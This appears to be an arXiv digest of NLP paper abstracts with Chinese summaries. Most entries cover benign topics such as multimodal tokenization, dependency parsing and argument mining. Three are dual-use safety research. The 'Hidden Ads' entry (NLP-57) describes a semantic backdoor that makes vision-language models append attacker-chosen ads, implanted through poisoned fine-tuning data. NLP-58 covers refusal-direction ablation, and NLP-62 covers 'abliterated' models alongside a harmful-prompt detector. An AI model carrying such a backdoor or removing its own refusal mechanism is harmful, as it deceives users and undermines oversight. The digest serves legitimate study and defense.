Abstract:I propose Umwelt engineering – the deliberate design of the linguistic cognitive environment – as a third layer in the agent design stack, upstream of both prompt and context engineering. Two experiments test the thesis that altering the medium of reasoning alters cognition itself. In Experiment 1, three language models reason under two vocabulary constraints – No-Have (eliminating possessive “to have”) and E-Prime (eliminating “to be”) – across seven tasks (N=4,470 trials). No-Have improves ethical reasoning by 19.1 pp (p < 0.001), classification by 6.5 pp (p < 0.001), and epistemic calibration by 7.4 pp, while achieving 92.8% constraint compliance. E-Prime shows dramatic but model-dependent effects: cross-model correlations reach r = -0.75. In Experiment 2, 16 linguistically constrained agents tackle 17 debugging problems. No constrained agent outperforms the control individually, yet a 3-agent ensemble achieves 100% ground-truth coverage versus 88.2% for the control. A permutation test confirms only 8% of random 3-agent subsets achieve full coverage, and every successful subset contains the counterfactual agent. Two mechanisms emerge: cognitive restructuring and cognitive diversification. The primary limitation is the absence of an active control matching constraint prompt elaborateness.
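The vocabulary constraints themselves are mechanical to check. Below is a minimal per-sentence compliance scorer; the form lists are simplified assumptions, not the paper's actual lexicons.

```python
import re

# Inflected forms targeted by the two constraints (simplified lists).
E_PRIME_FORMS = {"be", "is", "am", "are", "was", "were", "been", "being",
                 "isn't", "aren't", "wasn't", "weren't"}
NO_HAVE_FORMS = {"have", "has", "had", "having",
                 "hasn't", "haven't", "hadn't"}

def constraint_compliance(text, banned):
    """Fraction of sentences containing none of the banned forms,
    mirroring a per-sentence constraint-compliance rate."""
    sentences = [s for s in re.split(r"[.!?]+", text) if s.strip()]
    def ok(sentence):
        tokens = re.findall(r"[a-z']+", sentence.lower())
        return not any(t in banned for t in tokens)
    compliant = sum(ok(s) for s in sentences)
    return compliant / len(sentences) if sentences else 1.0
```

A score of 92.8%, as reported for No-Have, would mean roughly 93 of every 100 generated sentences avoid the banned forms entirely.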
[NLP-55] LongCat-Next: Lexicalizing Modalities as Discrete Tokens
【速读】: 该论文旨在解决当前多模态系统仍以语言为中心、非语言模态(如视觉和音频)常被作为外部附加模块处理所导致的架构碎片化与整合效率低下问题。其核心解决方案是提出一种统一的离散原生自回归框架(Discrete Native Autoregressive, DiNA),通过将多模态信息映射到共享的离散空间,实现跨模态的一致且原则性的自回归建模。关键创新在于设计了离散原生任意分辨率视觉Transformer(dNaViT),可对连续视觉信号进行任意分辨率的离散化tokenization与de-tokenization,从而构建出一个原生支持文本、视觉和音频的多模态模型LongCat-Next,该模型在单一自回归目标下完成理解与生成任务,显著提升了离散视觉建模在理解类任务上的性能瓶颈,并有效调和了理解与生成之间的冲突。
链接: https://arxiv.org/abs/2603.27538
作者: Meituan LongCat Team:Bin Xiao,Chao Wang,Chengjiang Li,Chi Zhang,Chong Peng,Hang Yu,Hao Yang,Haonan Yan,Haoze Sun,Haozhe Zhao,Hong Liu,Hui Su,Jiaqi Zhang,Jiawei Wang,Jing Li,Kefeng Zhang,Manyuan Zhang,Minhao Jing,Peng Pei,Quan Chen,Taofeng Xue,Tongxin Pan,Xiaotong Li,Xiaoyang Li,Xiaoyu Zhao,Xing Hu,Xinyang Lin,Xunliang Cai,Yan Bai,Yan Feng,Yanjie Li,Yao Qiu,Yerui Sun,Yifan Lu,Ying Luo,Yipeng Mei,Yitian Chen,Yuchen Xie,Yufang Liu,Yufei Chen,Yulei Qian,Yuqi Peng,Zhihang Yu,Zhixiong Han,Changran Wang,Chen Chen,Dian Zheng,Fengjiao Chen,Ge Yang,Haowei Guo,Haozhe Wang,Hongyu Li,Huicheng Jiang,Jiale Hong,Jialv Zou,Jiamu Li,Jianping Lin,Jiaxing Liu,Jie Yang,Jing Jin,Jun Kuang,Juncheng She,Kunming Luo,Kuofeng Gao,Lin Qiu,Linsen Guo,Mianqiu Huang,Qi Li,Qian Wang,Rumei Li,Siyu Ren,Wei Wang,Wenlong He,Xi Chen,Xiao Liu,Xiaoyu Li,Xu Huang,Xuanyu Zhu,Xuezhi Cao,Yaoming Zhu,Yifei Cao,Yimeng Jia,Yizhen Jiang,Yufei Gao,Zeyang Hu,Zhenlong Yuan,Zijian Zhang,Ziwen Wang
机构: Meituan LongCat Team(美团龙猫团队)
类目: Computer Vision and Pattern Recognition (cs.CV); Computation and Language (cs.CL)
备注: LongCat-Next Technical Report
Abstract:The prevailing Next-Token Prediction (NTP) paradigm has driven the success of large language models through discrete autoregressive modeling. However, contemporary multimodal systems remain language-centric, often treating non-linguistic modalities as external attachments, leading to fragmented architectures and suboptimal integration. To transcend this limitation, we introduce Discrete Native Autoregressive (DiNA), a unified framework that represents multimodal information within a shared discrete space, enabling a consistent and principled autoregressive modeling across modalities. A key innovation is the Discrete Native Any-resolution Visual Transformer (dNaViT), which performs tokenization and de-tokenization at arbitrary resolutions, transforming continuous visual signals into hierarchical discrete tokens. Building on this foundation, we develop LongCat-Next, a native multimodal model that processes text, vision, and audio under a single autoregressive objective with minimal modality-specific design. As an industrial-strength foundation model, it excels at seeing, painting, and talking within a single framework, achieving strong performance across a wide range of multimodal benchmarks. In particular, LongCat-Next addresses the long-standing performance ceiling of discrete vision modeling on understanding tasks and provides a unified approach to effectively reconcile the conflict between understanding and generation. As an attempt toward native multimodality, we open-source the LongCat-Next and its tokenizers, hoping to foster further research and development in the community. GitHub: this https URL
[NLP-56] A gentle tutorial and a structured reformulation of Bocks algorithm for minimum directed spanning trees
【速读】: 该论文旨在解决Bock于1971年提出的构造最小有向生成树(minimum directed spanning tree)算法在现代读者中的可读性与可复现性问题,并阐明其作为非投射图依赖句法分析(nonprojective graph-based dependency parsing)精确解码器的适用性。解决方案的关键在于:首先以清晰的结构化方式重述原始算法的目标函数和执行流程,提供从初始化到终止的完整逐行执行轨迹;其次引入一种显式描述阶段结构、状态维护与控制流的重构版本,在保持原逻辑不变的前提下提升算法的透明度与实用性;最后通过一个来自Jurafsky & Martin(2026)教材的依赖解析实例,展示如何通过标准仿射变换将最大权重有向生成树问题转化为Bock的最小成本形式,并在同一状态变量下完成追踪,从而验证其在实际自然语言处理任务中的有效性。
链接: https://arxiv.org/abs/2603.27530
作者: Yuxi Wang,Jungyeul Park
机构: 未知
类目: Computation and Language (cs.CL)
备注:
Abstract:This paper presents a gentle tutorial and a structured reformulation of Bock’s 1971 Algol procedure for constructing minimum directed spanning trees. Our aim is to make the original algorithm readable and reproducible for modern readers, while highlighting its relevance as an exact decoder for nonprojective graph-based dependency parsing. We restate the minimum arborescence objective in Bock’s notation and provide a complete line-by-line execution trace of the original ten-node example, extending the partial trace given in the source paper from initialization to termination. We then introduce a structured reformulation that makes explicit the procedure’s phase structure, maintained state, and control flow, while preserving the logic of the original method. As a further illustration, we include a worked example adapted from jurafsky-martin-2026-book for dependency parsing, showing how a maximum-weight arborescence problem is reduced to Bock’s minimum-cost formulation by a standard affine transformation and traced under the same state variables.
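The affine reduction mentioned in the abstract (turning a maximum-weight arborescence problem into a minimum-cost one) can be checked on a toy graph. The brute-force search below is only a verification aid for tiny n, not Bock's algorithm itself; the weight matrix is made up for illustration.

```python
from itertools import product

def tree_weight(heads, w):
    """Total weight of a head assignment if it forms a valid arborescence
    rooted at node 0, else None. heads[i] is the head of node i (i >= 1)."""
    n = len(w)
    for i in range(1, n):
        seen, j = set(), i
        while j != 0:           # every node must reach the root acyclically
            if j in seen:
                return None
            seen.add(j)
            j = heads[j]
    return sum(w[heads[i]][i] for i in range(1, n))

def best_arborescence(w, minimize=False):
    """Exhaustive search over head assignments (fine for tiny n)."""
    n = len(w)
    best, best_heads = None, None
    for hs in product(range(n), repeat=n - 1):
        heads = (None,) + hs
        wt = tree_weight(heads, w)
        if wt is None:
            continue
        if best is None or (wt < best if minimize else wt > best):
            best, best_heads = wt, heads
    return best_heads

# Affine reduction: argmax under w equals argmin under C - w, because
# every spanning arborescence has exactly n - 1 arcs.
w = [[0, 10, 9, 9],
     [0, 0, 3, 5],
     [0, 2, 0, 8],
     [0, 3, 7, 0]]
C = max(max(row) for row in w) + 1
w_min = [[C - w[i][j] for j in range(4)] for i in range(4)]
assert best_arborescence(w) == best_arborescence(w_min, minimize=True)
```

The same tree wins under both formulations, which is exactly what licenses decoding a maximum-weight dependency parse with a minimum-cost procedure like Bock's.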
[NLP-57] Hidden Ads: Behavior Triggered Semantic Backdoors for Advertisement Injection in Vision Language Models
【速读】: 该论文旨在解决视觉语言模型(Vision-Language Models, VLMs)在消费级推荐场景中面临的新型后门攻击问题,即“隐藏广告”(Hidden Ads)——这类攻击利用用户自然行为(如上传特定语义内容图像并提出推荐请求)触发未经授权的广告插入,同时保持模型在正常任务上的准确性与实用性。其解决方案的关键在于设计一种基于多层级威胁框架的攻击方法,通过教师VLM生成的思维链推理(chain-of-thought reasoning)构建自然触发-标语关联数据,使攻击能在不依赖人工标记触发器的情况下实现高隐蔽性、高注入成功率和低误报率,并具备跨域迁移能力与多并发广告注入能力,显著提升了现实部署中的可行性与危害性。
链接: https://arxiv.org/abs/2603.27522
作者: Duanyi Yao,Changyue Li,Zhicong Huang,Cheng Hong,Songze Li
机构: 未知
类目: Computation and Language (cs.CL); Cryptography and Security (cs.CR); Machine Learning (cs.LG)
备注:
Abstract:Vision-Language Models (VLMs) are increasingly deployed in consumer applications where users seek recommendations about products, dining, and services. We introduce Hidden Ads, a new class of backdoor attacks that exploit this recommendation-seeking behavior to inject unauthorized advertisements. Unlike traditional pattern-triggered backdoors that rely on artificial triggers such as pixel patches or special tokens, Hidden Ads activates on natural user behaviors: when users upload images containing semantic content of interest (e.g., food, cars, animals) and ask recommendation-seeking questions, the backdoored model provides correct, helpful answers while seamlessly appending attacker-specified promotional slogans. This design preserves model utility and produces natural-sounding injections, making the attack practical for real-world deployment in consumer-facing recommendation services. We propose a multi-tier threat framework to systematically evaluate Hidden Ads across three adversary capability levels: hard prompt injection, soft prompt optimization, and supervised fine-tuning. Our poisoned data generation pipeline uses teacher VLM-generated chain-of-thought reasoning to create natural trigger–slogan associations across multiple semantic domains. Experiments on three VLM architectures demonstrate that Hidden Ads achieves high injection efficacy with near-zero false positives while maintaining task accuracy. Ablation studies confirm that the attack is data-efficient, transfers effectively to unseen datasets, and scales to multiple concurrent domain-slogan pairs. We evaluate defenses including instruction-based filtering and clean fine-tuning, finding that both fail to remove the backdoor without causing significant utility degradation. 
[NLP-58] Over-Refusal and Representation Subspaces: A Mechanistic Analysis of Task-Conditioned Refusal in Aligned LLM s
【速读】: 该论文旨在解决对齐语言模型中存在的“过度拒绝”(over-refusal)问题,即模型在面对看似有害但实际安全的请求时仍会错误地拒绝。研究表明,这种现象源于有害拒绝与过度拒绝在表征几何结构上的本质差异:有害拒绝方向具有任务无关性,可由单一全局向量捕获;而过度拒绝方向则依赖于具体任务,分布在良性任务表示簇内部,维度更高且随任务变化。因此,解决方案的关键在于摒弃传统的全局方向消融方法,转而采用基于任务特定几何干预的策略,以精准修正过度拒绝而不破坏整体拒绝机制。
链接: https://arxiv.org/abs/2603.27518
作者: Utsav Maskey,Mark Dras,Usman Naseem
机构: Macquarie University (麦考瑞大学)
类目: Computation and Language (cs.CL)
备注: Preprint
Abstract:Aligned language models that are trained to refuse harmful requests also exhibit over-refusal: they decline safe instructions that seemingly resemble harmful instructions. A natural approach is to ablate the global refusal direction, steering the hidden-state vectors away or towards the harmful-refusal examples, but this corrects over-refusal only incidentally while disrupting the broader refusal mechanism. In this work, we analyse the representational geometry of both refusal types to understand why this happens. We show that harmful-refusal directions are task-agnostic and can be captured by a single global vector, whereas over-refusal directions are task-dependent: they reside within the benign task-representation clusters, vary across tasks, and span a higher-dimensional subspace. Linear probing confirms that the two refusal types are representationally distinct from the early transformer layers. These findings provide a mechanistic explanation of why global direction ablation alone cannot address over-refusal, and establish that task-specific geometric interventions are necessary.
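The global direction ablation the paper critiques is a simple projection removal. A minimal sketch (plain lists standing in for hidden-state tensors):

```python
def ablate_direction(hidden_states, direction):
    """Project out a single 'refusal direction' v from each hidden-state
    vector: h' = h - (h . v_hat) v_hat, leaving components orthogonal
    to v untouched."""
    norm = sum(x * x for x in direction) ** 0.5
    v = [x / norm for x in direction]
    out = []
    for h in hidden_states:
        dot = sum(a * b for a, b in zip(h, v))
        out.append([a - dot * b for a, b in zip(h, v)])
    return out
```

After ablation every vector has (numerically) zero component along v. The paper's point is that a single such direction can capture task-agnostic harmful refusal, but not the higher-dimensional, task-dependent over-refusal subspace.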
[NLP-59] A tree interpretation of arc standard dependency derivation
【速读】: 该论文旨在解决依赖句法分析中非投射性(non-projectivity)结构的建模与稳定恢复问题,尤其是在基于转换的解析器框架下如何有效处理投射性(projectivity)限制。其解决方案的关键在于提出一种**弧标准转换序列(arc-standard transition sequence)**的树表示方法:通过将每个转换操作(shift、leftarc、rightarc)直接解释为有序树的确定性更新,从而生成具有表面连续产出(surface-contiguous yields)和稳定词项锚定(stable lexical anchoring)的唯一有序树结构。该表示不仅等价于原始依赖弧的完整信息,且能精确刻画投射性——即一个单头依赖树存在此类有序表示当且仅当它是投射的。对于非投射输入,可通过伪投射提升(pseudo-projective lifting)预处理与逆解码(inverse decoding)后处理实现实际应用。
链接: https://arxiv.org/abs/2603.27459
作者: Zihao Huang,Ai Ka Lee,Jungyeul Park
机构: 未知
类目: Computation and Language (cs.CL)
备注:
Abstract:We show that arc-standard derivations for projective dependency trees determine a unique ordered tree representation with surface-contiguous yields and stable lexical anchoring. Each shift, leftarc, and rightarc transition corresponds to a deterministic tree update, and the resulting hierarchical object uniquely determines the original dependency arcs. We further show that this representation characterizes projectivity: a single-headed dependency tree admits such a contiguous ordered representation if and only if it is projective. The proposal is derivational rather than convertive. It interprets arc-standard transition sequences directly as ordered tree construction, rather than transforming a completed dependency graph into a phrase-structure output. For non-projective inputs, the same interpretation can be used in practice via pseudo-projective lifting before derivation and inverse decoding after recovery. A proof-of-concept implementation in a standard neural transition-based parser shows that the mapped derivations are executable and support stable dependency recovery.
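A minimal executable reading of the transition-to-arc mapping (a generic arc-standard executor, not the paper's tree construction itself):

```python
def run_arc_standard(n_words, transitions):
    """Execute an arc-standard sequence over words 1..n_words (0 = the
    artificial root) and return the derived (head, dependent) arcs."""
    buffer = list(range(1, n_words + 1))
    stack = [0]
    arcs = set()
    for t in transitions:
        if t == "shift":
            stack.append(buffer.pop(0))
        elif t == "leftarc":
            # head = stack top, dependent = element just below it
            top = stack.pop()
            arcs.add((top, stack.pop()))
            stack.append(top)
        elif t == "rightarc":
            # head = element below the top, dependent = stack top
            dep = stack.pop()
            arcs.add((stack[-1], dep))
    return arcs

# "She saw him": saw (2) heads She (1) and him (3); root arc 0 -> 2.
seq = ["shift", "shift", "leftarc", "shift", "rightarc", "rightarc"]
assert run_arc_standard(3, seq) == {(2, 1), (2, 3), (0, 2)}
```

The paper's contribution is to interpret each of these updates as growing an ordered tree whose yields stay surface-contiguous; the executor above only recovers the arcs.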
[NLP-60] Multi-Agent Dialectical Refinement for Enhanced Argument Classification
【速读】: 该论文旨在解决生成式 AI(Generative AI)在论点挖掘(Argument Mining, AM)任务中面临的两大挑战:一是传统监督学习方法依赖昂贵的领域特定微调;二是大型语言模型(Large Language Models, LLMs)在处理结构歧义时易混淆论点组件(如主张与前提),且单代理自我修正机制常因“谄媚倾向”(sycophancy)而强化初始错误。解决方案的关键在于提出MAD-ACC(Multi-Agent Debate for Argument Component Classification)框架,其核心是采用“支持者-反对者-裁判”多智能体辩论机制,通过辩证精炼(dialectical refinement)暴露文本中的逻辑细微差别,从而提升分类准确性与可解释性。实验表明,该方法在UKP学生作文语料库上达到85.7%的宏平均F1分数,显著优于单代理基线,并且无需领域训练即可实现透明、可读的决策推理过程。
链接: https://arxiv.org/abs/2603.27451
作者: Jakub Bąba,Jarosław A. Chudziak
机构: 未知
类目: Computation and Language (cs.CL); Artificial Intelligence (cs.AI)
备注: Accepted for publication in the proceedings of ACIIDS 2026
Abstract:Argument Mining (AM) is a foundational technology for automated writing evaluation, yet traditional supervised approaches rely heavily on expensive, domain-specific fine-tuning. While Large Language Models (LLMs) offer a training-free alternative, they often struggle with structural ambiguity, failing to distinguish between similar components like Claims and Premises. Furthermore, single-agent self-correction mechanisms often suffer from sycophancy, where the model reinforces its own initial errors rather than critically evaluating them. We introduce MAD-ACC (Multi-Agent Debate for Argument Component Classification), a framework that leverages dialectical refinement to resolve classification uncertainty. MAD-ACC utilizes a Proponent-Opponent-Judge model where agents defend conflicting interpretations of ambiguous text, exposing logical nuances that single-agent models miss. Evaluation on the UKP Student Essays corpus demonstrates that MAD-ACC achieves a Macro F1 score of 85.7%, significantly outperforming single-agent reasoning baselines, without requiring domain-specific training. Additionally, unlike “black-box” classifiers, MAD-ACC’s dialectical approach offers a transparent and explainable alternative by generating human-readable debate transcripts that explain the reasoning behind decisions.
[NLP-61] Improving Attributed Long-form Question Answering with Intent Awareness
【速读】: 该论文旨在解决大语言模型(Large Language Models, LLMs)在生成知识密集型长篇报告时质量不足的问题,其核心挑战在于模型缺乏对作者撰写意图和推理过程的理解。为应对这一问题,研究提出通过结构化的标签化方案来显式提取并引导模型识别隐含的写作意图(如引用动机、论证目标等),从而增强模型的意图感知能力。解决方案的关键在于利用这些提取出的意图作为指导信号,不仅提升了模型在零样本场景下的生成质量,还支持构建高质量合成数据用于微调小型模型,最终在科学报告生成任务中显著改善了内容准确性、可读性和引用合理性。
链接: https://arxiv.org/abs/2603.27435
作者: Xinran Zhao,Aakanksha Naik,Jay DeYoung,Joseph Chee Chang,Jena D. Hwang,Tongshuang Wu,Varsha Kishore
机构: Allen Institute for AI (艾伦人工智能研究所); Carnegie Mellon University (卡内基梅隆大学); University of Washington (华盛顿大学)
类目: Computation and Language (cs.CL); Artificial Intelligence (cs.AI)
备注: 39 pages, 7 figures
Abstract:Large language models (LLMs) are increasingly being used to generate comprehensive, knowledge-intensive reports. However, while these models are trained on diverse academic papers and reports, they are not exposed to the reasoning processes and intents that guide authors in crafting these documents. We hypothesize that enhancing a model’s intent awareness can significantly improve the quality of generated long-form reports. We develop and employ structured, tag-based schemes to better elicit underlying implicit intents to write or cite. We demonstrate that these extracted intents enhance both zero-shot generation capabilities in LLMs and enable the creation of high-quality synthetic data for fine-tuning smaller models. Our experiments reveal improved performance across various challenging scientific report generation tasks, with an average improvement of +2.9 and +12.3 absolute points for large and small models over baselines, respectively. Furthermore, our analysis illuminates how intent awareness enhances model citation usage and substantially improves report readability.
[NLP-62] he Geometry of Harmful Intent: Training-Free Anomaly Detection via Angular Deviation in LLM Residual Streams
【速读】: 该论文旨在解决大语言模型(Large Language Models, LLMs)中无监督、无需训练即可检测有害提示(harmful prompts)的问题。传统方法通常依赖于大量标注的有害样本进行训练,而本文提出了一种无需任何有害样本的训练-free 方法 LatentBiopsy,其核心在于分析模型残差流(residual-stream)激活空间中的几何结构:通过计算 200 个安全规范提示在目标层的激活主成分方向,将新提示的径向偏离角 θ 作为特征,并基于高斯拟合计算其负对数似然作为异常分数,从而实现对有害提示的敏感识别。该方案的关键创新在于利用提示在残差流空间中的角度分布差异——有害提示表现出极窄的近退化角分布(σ_θ ≈ 0.03 rad),显著区别于正常提示的宽泛分布(σ_θ ≈ 0.27 rad),且该几何特性在模型对齐(alignment)阶段及拒绝机制删减后仍保持稳定,支持方向无关的评分策略,实现了高精度(AUROC ≥ 0.937)和低延迟(亚毫秒级)的检测性能。
链接: https://arxiv.org/abs/2603.27412
作者: Isaac Llorente-Saguer
机构: Qwen (通义千问)
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
备注: 20 pages, 10 figures, 3 tables. Training-free harmful-prompt detector via angular deviation in LLM residual streams. Evaluated on six Qwen variants (base / instruct / abliterated). Achieves AUROC over 0.937 (harmful-vs-normative) and 1.000 (harmful-vs-benign-aggressive) with no harmful training data
Abstract:We present LatentBiopsy, a training-free method for detecting harmful prompts by analysing the geometry of residual-stream activations in large language models. Given 200 safe normative prompts, LatentBiopsy computes the leading principal component of their activations at a target layer and characterises new prompts by their radial deviation angle θ from this reference direction. The anomaly score is the negative log-likelihood of θ under a Gaussian fit to the normative distribution, flagging deviations symmetrically regardless of orientation. No harmful examples are required for training. We evaluate two complete model triplets from the Qwen3.5-0.8B and Qwen2.5-0.5B families: base, instruction-tuned, and abliterated (refusal direction surgically removed via orthogonalisation). Across all six variants, LatentBiopsy achieves AUROC ≥ 0.937 for harmful-vs-normative detection and AUROC = 1.000 for discriminating harmful from benign-aggressive prompts (XSTest), with sub-millisecond per-query overhead. Three empirical findings emerge. First, geometry survives refusal ablation: both abliterated variants achieve AUROC at most 0.015 below their instruction-tuned counterparts, establishing a geometric dissociation between harmful-intent representation and the downstream generative refusal mechanism. Second, harmful prompts exhibit a near-degenerate angular distribution (σ_θ ≈ 0.03 rad), an order of magnitude tighter than the normative distribution (σ_θ ≈ 0.27 rad), preserved across all alignment stages including abliteration. Third, the two families exhibit opposite ring orientations at the same depth: harmful prompts occupy the outer ring in Qwen3.5-0.8B but the inner ring in Qwen2.5-0.5B, directly motivating the direction-agnostic scoring rule.
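The scoring pipeline described in the abstract reduces to a few numeric steps: fit a reference direction, measure sign-agnostic angles, and score new angles under a Gaussian. The sketch below uses pure-Python power iteration on toy 2-D "activations" with made-up data; it mirrors the idea, not the paper's implementation.

```python
import math
import random

def leading_direction(X, iters=200, seed=0):
    """Power iteration for the leading principal component of X (a list
    of vectors); returns (mean, unit direction)."""
    n, d = len(X), len(X[0])
    mu = [sum(row[j] for row in X) / n for j in range(d)]
    Xc = [[row[j] - mu[j] for j in range(d)] for row in X]
    rng = random.Random(seed)
    v = [rng.gauss(0, 1) for _ in range(d)]
    for _ in range(iters):
        proj = [sum(a * b for a, b in zip(row, v)) for row in Xc]
        v = [sum(p * row[j] for p, row in zip(proj, Xc)) for j in range(d)]
        norm = math.sqrt(sum(x * x for x in v)) or 1.0
        v = [x / norm for x in v]
    return mu, v

def deviation_angle(x, mu, v):
    """Radial angle between a centred activation and the reference
    direction, sign-agnostic via the absolute cosine."""
    xc = [a - m for a, m in zip(x, mu)]
    norm = math.sqrt(sum(a * a for a in xc)) or 1.0
    cos = abs(sum(a * b for a, b in zip(xc, v))) / norm
    return math.acos(min(1.0, cos))

def anomaly_score(ref_angles, theta):
    """Negative log-likelihood of theta under a Gaussian fit to the
    reference (normative) angles."""
    n = len(ref_angles)
    mean = sum(ref_angles) / n
    var = sum((t - mean) ** 2 for t in ref_angles) / n + 1e-9
    return 0.5 * math.log(2 * math.pi * var) + (theta - mean) ** 2 / (2 * var)
```

Points lying along the fitted reference direction get small angles and low scores; a prompt whose activation deviates sharply from that axis gets a large θ and a much higher anomaly score, in either direction.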
[NLP-63] Not Worth Mentioning? A Pilot Study on Salient Proposition Annotation
【速读】: 该论文旨在解决自然语言处理中关于命题显著性(proposition salience)的量化问题,即如何在真实语料中操作化地定义和测量不同命题的重要性梯度。以往研究多集中于抽取式摘要(extractive summarization),侧重于提取重要命题,但缺乏对命题显著性进行分级评估的方法。本文的关键解决方案是借鉴已有研究中的显著实体抽取(Salient Entity Extraction, SEE)所采用的分级摘要型显著性指标,并将其扩展至命题层面,通过定义新的标注任务,在多体裁小规模数据集上进行实证评估,从而建立命题显著性与基于修辞结构理论(Rhetorical Structure Theory, RST)的篇章单元中心性之间的初步关联。
链接: https://arxiv.org/abs/2603.27358
作者: Amir Zeldes,Katherine Conhaim,Lauren Levine
机构: Georgetown University (乔治城大学)
类目: Computation and Language (cs.CL)
备注:
Abstract:Despite a long tradition of work on extractive summarization, which by nature aims to recover the most important propositions in a text, little work has been done on operationalizing graded proposition salience in naturally occurring data. In this paper, we adopt graded summarization-based salience as a metric from previous work on Salient Entity Extraction (SEE) and adapt it to quantify proposition salience. We define the annotation task, apply it to a small multi-genre dataset, evaluate agreement and carry out a preliminary study of the relationship between our metric and notions of discourse unit centrality in discourse parsing following Rhetorical Structure Theory (RST).
[NLP-64] Culturally Adaptive Explainable LLM Assessment for Multilingual Information Disorder: A Human-in-the-Loop Approach LREC2026
【速读】: 该论文旨在解决当前大型语言模型(Large Language Models, LLMs)在识别信息失序(Information Disorder)时因文化与语言背景局限性而导致的解释能力不足问题,尤其体现在其生成的推理过程常忽略本地化语境,缺乏跨文化一致性。解决方案的关键在于提出一种“混合智能循环”(Hybrid Intelligence Loop)框架,该框架采用人机协同(Human-in-the-Loop, HITL)机制,通过引入母语标注者撰写的真实理由(rationales),结合上下文学习(In-Context Learning, ICL)动态检索目标语言示例,替代传统的静态少样本提示方法,从而提升模型在不同文化语境下对新闻操纵的判别准确性、推理合理性及解释的文化适配性。
链接: https://arxiv.org/abs/2603.27356
作者: Maziar Kianimoghadam Jouneghani
机构: 未知
类目: Computation and Language (cs.CL); Artificial Intelligence (cs.AI); Computers and Society (cs.CY)
备注: 9 pages, 3 figures, 1 table. Accepted to the Information Disorder Workshop at LREC 2026
Abstract:Recognizing information disorder is difficult because judgments about manipulation depend on cultural and linguistic context. Yet current Large Language Models (LLMs) often behave as monocultural, English-centric “black boxes,” producing fluent rationales that overlook localized framing. Preliminary evidence from the multilingual Information Disorder (InDor) corpus suggests that existing models struggle to explain manipulated news consistently across communities. To address this gap, this ongoing study proposes a Hybrid Intelligence Loop, a human-in-the-loop (HITL) framework that grounds model assessment in human-written rationales from native-speaking annotators. The approach moves beyond static target-language few-shot prompting by pairing English task instructions with dynamically retrieved target-language exemplars drawn from filtered InDor annotations through In-Context Learning (ICL). In the initial pilot, the Exemplar Bank is seeded from these filtered annotations and used to compare static and adaptive prompting on Farsi and Italian news. The study evaluates span and severity prediction, the quality and cultural appropriateness of generated rationales, and model alignment across evaluator groups, providing a testbed for culturally grounded explainable AI.
[NLP-65] LLM Readiness Harness: Evaluation Observability and CI Gates for LLM /RAG Applications
【速读】: 该论文旨在解决大语言模型(Large Language Model, LLM)和检索增强生成(Retrieval-Augmented Generation, RAG)应用在部署前缺乏系统性、可操作的评估与决策机制的问题。现有方法通常仅提供离线指标分数,无法有效指导是否真正具备上线条件。其解决方案的关键在于构建一个“就绪度工作流”(readiness harness),通过整合自动化基准测试、OpenTelemetry可观测性以及持续集成(CI)质量门禁,在最小API契约下聚合多个维度指标(如工作流成功率、策略合规性、事实一致性、召回率、成本和p95延迟),并基于场景权重生成帕累托前沿(Pareto frontiers)的就绪评分,从而将评估转化为可执行的部署决策流程。该框架已在票务路由和BEIR接地任务(SciFact与FiQA)中验证有效性,证明了其能识别出高风险提示变体并阻止不安全发布,实现可复现且面向运维落地的LLM/RAG系统就绪判断。
链接: https://arxiv.org/abs/2603.27355
作者: Alexandre Cristovão Maiorano
机构: Lumytics
类目: Artificial Intelligence (cs.AI); Computation and Language (cs.CL); Software Engineering (cs.SE)
备注: 18 pages, 4 figures, 15 tables, arXiv preprint
Abstract:We present a readiness harness for LLM and RAG applications that turns evaluation into a deployment decision workflow. The system combines automated benchmarks, OpenTelemetry observability, and CI quality gates under a minimal API contract, then aggregates workflow success, policy compliance, groundedness, retrieval hit rate, cost, and p95 latency into scenario-weighted readiness scores with Pareto frontiers. We evaluate the harness on ticket-routing workflows and BEIR grounding tasks (SciFact and FiQA) with full Azure matrix coverage (162/162 valid cells across datasets, scenarios, retrieval depths, seeds, and models). Results show that readiness is not a single metric: on FiQA under sla-first at k=5, gpt-4.1-mini leads in readiness and faithfulness, while gpt-5.2 pays a substantial latency cost; on SciFact, models are closer in quality but still separable operationally. Ticket-routing regression gates consistently reject unsafe prompt variants, demonstrating that the harness can block risky releases instead of merely reporting offline scores. The result is a reproducible, operationally grounded framework for deciding whether an LLM or RAG system is ready to ship.
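The aggregation step, scenario-weighted scores plus Pareto frontiers over quality, cost, and latency, can be sketched generically. The metric names and weights here are illustrative, not the harness's actual schema.

```python
def pareto_frontier(points):
    """Keep configurations not dominated on (quality up, cost down,
    latency down). Each point: (name, quality, cost, latency)."""
    def dominates(a, b):
        return (a[1] >= b[1] and a[2] <= b[2] and a[3] <= b[3]
                and (a[1] > b[1] or a[2] < b[2] or a[3] < b[3]))
    return [p for p in points
            if not any(dominates(q, p) for q in points if q is not p)]

def readiness_score(metrics, weights):
    """Scenario-weighted aggregate of normalized metric values in [0, 1];
    different scenarios (e.g. sla-first) just swap the weight vector."""
    total = sum(weights.values())
    return sum(weights[k] * metrics[k] for k in weights) / total
```

This captures the abstract's point that readiness is not a single metric: one model can lead the weighted score while another remains on the frontier because it is cheaper or faster.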
[NLP-66] Inference-Time Structural Reasoning for Compositional Vision-Language Understanding
【速读】: 该论文旨在解决视觉语言模型(Vision-Language Models, VLMs)在组合推理(compositional reasoning)能力上的不足,特别是其在区分语义相同但关系结构不同的图像描述(caption)时表现不佳的问题。针对此问题,作者提出了一种统一的评估与增强框架,在Winoground基准上对四种架构各异的VLMs(CLIP、BLIP、LLaVA和Qwen3-VL-8B-Thinking)进行评测,并引入基于依赖句法分析的TextSceneGraphParser(使用spaCy实现)提取主语-关系-宾语三元组,以及利用最优二分匹配的图不对称性评分器(Graph Asymmetry Scorer)注入结构化关系先验。关键创新在于多轮场景图(scene-graph, SG)过滤策略,显著提升了Qwen3-VL-8B-Thinking模型的性能至66.0,超越现有开源模型,同时揭示了场景图增强对能力强模型有正向提升作用,而对弱基线模型则效果有限甚至负面。
链接: https://arxiv.org/abs/2603.27349
作者: Amartya Bhattacharya
机构: Dartmouth College (达特茅斯学院)
类目: Computer Vision and Pattern Recognition (cs.CV); Computation and Language (cs.CL)
备注:
